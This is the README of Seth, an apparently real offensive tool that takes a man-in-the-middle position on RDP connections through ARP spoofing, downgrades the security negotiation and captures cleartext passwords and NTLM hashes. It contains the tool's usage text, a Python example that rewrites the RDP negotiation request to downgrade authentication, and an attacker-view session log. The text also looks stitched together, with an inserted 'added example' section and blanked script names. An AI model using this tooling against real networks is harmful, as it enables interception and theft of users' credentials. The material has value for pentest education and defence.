PACEJJ27 / Seth

Perform a MitM attack and extract clear text credentials from RDP connections



Seth is a tool written in Python and Bash that takes a MitM position on RDP connections and tries to downgrade the connection's security negotiation in order to extract clear text credentials. It was developed to raise awareness and educate about the importance of properly configured RDP connections in the context of pentests, workshops or talks.


Run the wrapper script with the network interface and the IP addresses of attacker, victim and gateway (see the example session below):


This script performs ARP spoofing to gain a Man-in-the-Middle position and redirects the victim's traffic so that it runs through an RDP proxy. The proxy can also be called on its own:

$ ./ -h
usage: [-h] [-d] [-p LISTEN_PORT] [-b BIND_IP]
                           [-g {0,1,3,11}] -c CERTFILE -k KEYFILE
                           target_host [target_port]

RDP credential sniffer -- Adrian Vollmer, SySS GmbH 2017

positional arguments:
  target_host           target host of the RDP service
  target_port           TCP port of the target RDP service (default 3389)

optional arguments:
  -h, --help            show this help message and exit
  -d, --debug           show debug information
  -p LISTEN_PORT, --listen-port LISTEN_PORT
                        TCP port to listen on (default 3389)
  -b BIND_IP, --bind-ip BIND_IP
                        IP address to bind the fake service to (default all)
  -g {0,1,3,11}, --downgrade {0,1,3,11}
                        downgrade the authentication protocol to this (default
  -c CERTFILE, --certfile CERTFILE
                        path to the certificate file
  -k KEYFILE, --keyfile KEYFILE
                        path to the key file

The values accepted by `-g` are the `requestedProtocols` flags of the RDP negotiation request: 0 is standard RDP security, 1 is TLS, 3 is TLS plus CredSSP (NLA), and 11 additionally includes CredSSP with early user authorization. For more information read the PDF in doc/paper (or read the code!). The paper also contains recommendations for countermeasures.
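The downgrade itself happens in the RDP negotiation request (RDP_NEG_REQ) that the client appends to its X.224 Connection Request; that is what `-g` and the "Downgrading authentication options from 11 to 3" line in the session below refer to. The following Python is an added example and not Seth's own code: it builds a constructed client request, rewrites `requestedProtocols` the way a downgrading proxy would, and parses the server's Connection Confirm, including the RDP_NEG_FAILURE a server that enforces NLA sends when asked for anything below CredSSP. Field layouts follow MS-RDPBCGR; the cookie user name, the packets and the allowed-protocol mask are constructed assumptions.

```python
"""Added example (not Seth's code): build, parse and downgrade the RDP
negotiation request carried in an X.224 Connection Request, and parse the
server's Connection Confirm.  All packets here are constructed, not captured."""
import struct

# requestedProtocols / selectedProtocol flags (MS-RDPBCGR 2.2.1.1.1)
PROTOCOL_RDP = 0x00000000        # standard RDP security: no TLS, no NLA
PROTOCOL_SSL = 0x00000001        # TLS
PROTOCOL_HYBRID = 0x00000002     # CredSSP (NLA)
PROTOCOL_RDSTLS = 0x00000004
PROTOCOL_HYBRID_EX = 0x00000008  # CredSSP with early user authorization

NEG_REQ, NEG_RSP, NEG_FAILURE = 0x01, 0x02, 0x03  # rdpNegData types
FAILURE_CODES = {                                 # RDP_NEG_FAILURE failureCode
    0x1: "SSL_REQUIRED_BY_SERVER",
    0x2: "SSL_NOT_ALLOWED_BY_SERVER",
    0x3: "SSL_CERT_NOT_ON_SERVER",
    0x4: "INCONSISTENT_FLAGS",
    0x5: "HYBRID_REQUIRED_BY_SERVER",
    0x6: "SSL_WITH_USER_AUTH_REQUIRED_BY_SERVER",
}
_NAMES = [(PROTOCOL_SSL, "SSL"), (PROTOCOL_HYBRID, "HYBRID"),
          (PROTOCOL_RDSTLS, "RDSTLS"), (PROTOCOL_HYBRID_EX, "HYBRID_EX")]


def describe_protocols(flags):
    """Human-readable flag set, e.g. 3 -> 'SSL|HYBRID', 0 -> 'RDP'."""
    return "|".join(n for bit, n in _NAMES if flags & bit) or "RDP"


def build_connection_request(requested, cookie=b"Cookie: mstshash=alice\r\n"):
    """TPKT + X.224 CR TPDU + optional cookie + RDP_NEG_REQ (omitted if None).
    The user name in the constructed cookie is an assumption."""
    neg_req = b"" if requested is None else struct.pack("<BBHI", NEG_REQ, 0, 8, requested)
    variable = cookie + neg_req
    li = 6 + len(variable)  # X.224 length indicator: header bytes after LI itself
    x224 = struct.pack(">BBHHB", li, 0xE0, 0, 0, 0) + variable
    return struct.pack(">BBH", 3, 0, 4 + len(x224)) + x224


def parse_connection_request(pkt):
    """Return (cookie, requestedProtocols, offset of requestedProtocols).
    requestedProtocols is None when the client sent no RDP_NEG_REQ, i.e. it
    only speaks standard RDP security."""
    if len(pkt) < 11 or pkt[0] != 3 or struct.unpack(">H", pkt[2:4])[0] != len(pkt):
        raise ValueError("bad TPKT header")
    li = pkt[4]
    if pkt[5] != 0xE0 or 5 + li > len(pkt):
        raise ValueError("not an X.224 Connection Request")
    variable = pkt[11:5 + li]  # after LI, CR/CDT, DST-REF, SRC-REF, class option
    if (len(variable) >= 8 and variable[-8] == NEG_REQ
            and struct.unpack("<H", variable[-6:-4])[0] == 8):
        offset = 5 + li - 4
        return variable[:-8], struct.unpack("<I", pkt[offset:offset + 4])[0], offset
    return variable, None, None


def downgrade_connection_request(pkt, allowed):
    """Rewrite requestedProtocols to (requested & allowed), so the proxy only
    ever removes protocols.  Returns (new_pkt, old_value, new_value)."""
    _, requested, offset = parse_connection_request(pkt)
    if requested is None:
        return pkt, None, None  # nothing to downgrade: already plain RDP security
    new = requested & allowed
    return pkt[:offset] + struct.pack("<I", new) + pkt[offset + 4:], requested, new


def build_connection_confirm(neg_type, value):
    """TPKT + X.224 CC TPDU + RDP_NEG_RSP or RDP_NEG_FAILURE (constructed)."""
    neg = struct.pack("<BBHI", neg_type, 0, 8, value)
    x224 = struct.pack(">BBHHB", 6 + len(neg), 0xD0, 0, 0, 0) + neg
    return struct.pack(">BBH", 3, 0, 4 + len(x224)) + x224


def parse_connection_confirm(pkt):
    """Return ('selected', protocolFlags) or ('failure', failureName)."""
    if len(pkt) < 11 or pkt[0] != 3 or pkt[5] != 0xD0:
        raise ValueError("not an X.224 Connection Confirm")
    data = pkt[11:5 + pkt[4]]
    if len(data) < 8:
        return ("selected", PROTOCOL_RDP)  # no rdpNegData: legacy server, RDP security
    ntype, _flags, _length, value = struct.unpack("<BBHI", data[:8])
    if ntype == NEG_RSP:
        return ("selected", value)
    if ntype == NEG_FAILURE:
        return ("failure", FAILURE_CODES.get(value, hex(value)))
    raise ValueError("unknown rdpNegData type %#x" % ntype)


if __name__ == "__main__":
    client = build_connection_request(PROTOCOL_SSL | PROTOCOL_HYBRID | PROTOCOL_HYBRID_EX)
    forged, old, new = downgrade_connection_request(client, PROTOCOL_SSL | PROTOCOL_HYBRID)
    print("Downgrading authentication options from %d (%s) to %d (%s)"
          % (old, describe_protocols(old), new, describe_protocols(new)))
    # A server that enforces NLA answers a request for TLS only with a failure:
    print(parse_connection_confirm(build_connection_confirm(NEG_FAILURE, 0x5)))
```

The mask form of the downgrade is a design choice of this example: it never grants the client a protocol it did not ask for, and a request that arrives without any RDP_NEG_REQ is passed through untouched because such a client is already limited to standard RDP security. A server that enforces NLA replies to a downgraded request with `HYBRID_REQUIRED_BY_SERVER` instead of falling back, which is why the session below notes that NLA was not enforced on the target.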


The following output shows the attacker's view. Seth sniffs an offline-crackable hash (the client's NTLM response) as well as the clear text password. Here, NLA is not enforced on the server and the victim ignored the certificate warning; both conditions matter, because a server that enforces NLA refuses a request downgraded below CredSSP, and a client that does not click through the warning never completes the TLS handshake with the proxy's cloned certificate. The client is Windows 7 and the server is Windows 10.

# ./ eth1 192.168.57.{103,2,102}
███████╗███████╗████████╗██╗  ██╗
██╔════╝██╔════╝╚══██╔══╝██║  ██║   by Adrian Vollmer
███████╗█████╗     ██║   ███████║
╚════██║██╔══╝     ██║   ██╔══██║   SySS GmbH, 2017
███████║███████╗   ██║   ██║  ██║
╚══════╝╚══════╝   ╚═╝   ╚═╝  ╚═╝
[*] Spoofing arp replies...
[*] Turning on IP forwarding...
[*] Set iptables rules for SYN packets...
[*] Waiting for a SYN packet to the original destination...
[+] Got it! Original destination is
[*] Clone the x509 certificate of the original destination...
[*] Adjust the iptables rule for all packets...
[*] Run RDP proxy...
Connection received from
Downgrading authentication options from 11 to 3
Enable SSL
Tamper with NTLM response
TLS alert access denied, Downgrading CredSSP
Waiting for connection
Connection received from
Enable SSL
Connection lost
Waiting for connection
Connection received from
Enable SSL
Hiding forged protocol request from client
Keyboard layout/type/subtype: 0x20409/0x7/0x0
Key release:                 Tab
^C[*] Cleaning up...
[*] Done.


Use at your own risk. Do not use without full consent of everyone involved. For educational purposes only.



License:MIT License


Languages: Python 78.0%, Shell 22.0%